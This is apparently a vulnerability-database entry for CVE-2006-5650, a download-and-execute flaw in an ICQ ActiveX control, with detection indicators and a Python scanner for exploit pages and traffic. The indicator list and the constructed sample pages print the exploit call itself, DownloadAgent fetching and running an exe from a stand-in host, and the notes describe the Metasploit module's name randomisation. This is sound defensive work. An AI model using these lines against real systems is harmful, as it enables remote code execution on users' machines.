CVE-2006-5650
published 2006-11-07

Priority: P3 · 54 · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 66.37% (99.2nd percentile)
The ICQPhone.SipxPhoneManager ActiveX control in America Online ICQ 5.1 allows remote attackers to download and execute arbitrary code via the DownloadAgent function, as demonstrated using an ICQ avatar.

Affected (1 range)

Vendor   Product   Version range          Fixed in
aol      icq       5.1 (per description)  not listed

Detection & IOCs (extracted from sources)

Indicators:
  • CLSID: 54BDE6EC-F42F-4500-AC46-905177444300
  • Command: new ActiveXObject('ICQPhone.SipxPhoneManager.1'); .DownloadAgent("<payload_url>/<exe>.exe");
  • URL: http://www.zerodayinitiative.com/advisories/ZDI-06-037/
  • Detect instantiation of the vulnerable ActiveX control in HTML or script content delivered over HTTP, by its ProgID 'ICQPhone.SipxPhoneManager.1' (script-side, via ActiveXObject) or its CLSID '54BDE6EC-F42F-4500-AC46-905177444300' (markup-side, via an <object classid> tag).
  • Inspect HTTP responses for calls to the DownloadAgent method on the ICQPhone.SipxPhoneManager object; the method fetches a remote .exe and executes it without user interaction, so any call to it in web content is an exploit attempt, not legitimate use.
  • The HTTP response that serves the PE payload carries 'Content-Type: application/octet-stream'; correlate it with an earlier HTML response referencing the CLSID 54BDE6EC-F42F-4500-AC46-905177444300 (or the ProgID) and a DownloadAgent URL pointing at the same resource to reconstruct the full attack chain.
  • The exploit can also be triggered through an ICQ message (e.g., a malicious avatar), so monitor the ICQ client's network traffic for outbound HTTP requests to attacker-controlled hosts that fetch .exe files shortly after a message is received.
  • The Metasploit module uses randomised variable names (rand_text_alpha) and randomised uppercase .exe filenames (rand_text_alpha_upper), so static string matching on variable names or filenames in the HTML payload is unreliable; detection should key on the stable ProgID/CLSID and on the DownloadAgent method-call pattern.
  • The module's URIPATH defaults to '/' and the payload is served under a '/PAYLOAD' sub-path, but both are attacker-configurable, so path-based detection alone is insufficient.
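The detection notes above, as an added Python example (not from the ZDI advisory, the Metasploit module, or this database): a scanner that keys on the stable ProgID/CLSID and the DownloadAgent call rather than on randomised names, plus a pass over an ordered list of HTTP transactions that ties an exploit page to the later application/octet-stream response serving its payload. The sample pages and traffic are constructed; the hosts, paths and filenames are illustrative and mimic the randomisation the notes describe.

```python
import re
from urllib.parse import urljoin

# Stable identifiers from the ZDI-06-037 advisory. Variable names, payload
# filename and URI path are attacker-chosen (randomised by the public
# Metasploit module), so they are deliberately not matched.
PROGID = "ICQPhone.SipxPhoneManager"
CLSID = "54BDE6EC-F42F-4500-AC46-905177444300"

# Script-side instantiation: new ActiveXObject('ICQPhone.SipxPhoneManager.1')
_RE_PROGID = re.compile(
    r"ActiveXObject\s*\(\s*[\"']" + re.escape(PROGID) + r"(?:\.\d+)?[\"']\s*\)",
    re.IGNORECASE,
)
# Markup-side instantiation: <object classid="clsid:{54BDE6EC-...}">
_RE_CLSID = re.compile(
    r"classid\s*=\s*[\"']?\s*(?:clsid:)?\s*\{?" + re.escape(CLSID) + r"\}?",
    re.IGNORECASE,
)
# The method that fetches and runs the payload. The argument is captured raw
# so both literal URLs and variable references are reported.
_RE_DOWNLOAD = re.compile(r"\.DownloadAgent\s*\(([^)]*)\)", re.IGNORECASE)
_RE_STRLIT = re.compile(r"^\s*[\"']([^\"']*)[\"']\s*$")


def scan_html(body: str) -> dict:
    """Classify one HTML/script body.
    verdict: 'exploit'    -> control instantiated and DownloadAgent called
             'suspicious' -> control referenced, no DownloadAgent call seen
             'clean'      -> neither indicator present"""
    progid = bool(_RE_PROGID.search(body))
    clsid = bool(_RE_CLSID.search(body))
    urls = []
    for m in _RE_DOWNLOAD.finditer(body):
        lit = _RE_STRLIT.match(m.group(1))
        urls.append(lit.group(1) if lit else "<non-literal:%s>" % m.group(1).strip())
    if (progid or clsid) and urls:
        verdict = "exploit"
    elif progid or clsid:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"progid": progid, "clsid": clsid, "download_urls": urls, "verdict": verdict}


def correlate_chain(transactions: list) -> list:
    """Walk HTTP transactions (dicts: url, content_type, body) in arrival order
    and report each exploit page whose DownloadAgent URL is later served as
    application/octet-stream, i.e. the page -> PE payload chain."""
    chains = []
    for i, tx in enumerate(transactions):
        if not tx["content_type"].lower().startswith("text/html"):
            continue
        hit = scan_html(tx["body"])
        if hit["verdict"] != "exploit":
            continue
        # Only literal URLs can be resolved; relative ones are joined to the page URL.
        wanted = {urljoin(tx["url"], u) for u in hit["download_urls"] if not u.startswith("<")}
        for later in transactions[i + 1:]:
            if (later["url"] in wanted
                    and later["content_type"].lower().startswith("application/octet-stream")):
                chains.append({"page": tx["url"], "payload": later["url"]})
    return chains


# Constructed sample pages (not captured data). A and B carry the same exploit
# with different randomised variable/file names and different instantiation paths.
PAGE_A = """<html><script>
var qZtHx = new ActiveXObject('ICQPhone.SipxPhoneManager.1');
qZtHx.DownloadAgent("http://192.0.2.10/PAYLOAD/KQWLP.exe");
</script></html>"""
PAGE_B = """<html><object id="o1" classid="clsid:{54BDE6EC-F42F-4500-AC46-905177444300}"></object>
<script>var u = "http://192.0.2.10/x/ZNVBW.exe"; o1.DownloadAgent(u);</script></html>"""
PAGE_CLEAN = """<html><script>
var fso = new ActiveXObject("Scripting.FileSystemObject");
</script></html>"""

# Constructed traffic: page A, then its payload, then page B without a payload fetch.
SAMPLE_TRAFFIC = [
    {"url": "http://192.0.2.10/", "content_type": "text/html", "body": PAGE_A},
    {"url": "http://192.0.2.10/PAYLOAD/KQWLP.exe", "content_type": "application/octet-stream", "body": "MZ..."},
    {"url": "http://192.0.2.10/b.html", "content_type": "text/html", "body": PAGE_B},
    {"url": "http://203.0.113.5/", "content_type": "text/html", "body": PAGE_CLEAN},
]

if __name__ == "__main__":
    for tx in SAMPLE_TRAFFIC:
        if tx["content_type"] == "text/html":
            print(tx["url"], scan_html(tx["body"])["verdict"])
    print(correlate_chain(SAMPLE_TRAFFIC))
```

Page B is still flagged 'exploit' although its payload URL is held in a variable: the verdict depends only on the control being referenced and DownloadAgent being called, which the randomisation in the module cannot hide. Only the chain correlation needs a literal URL, which is why B yields a verdict but no chain entry.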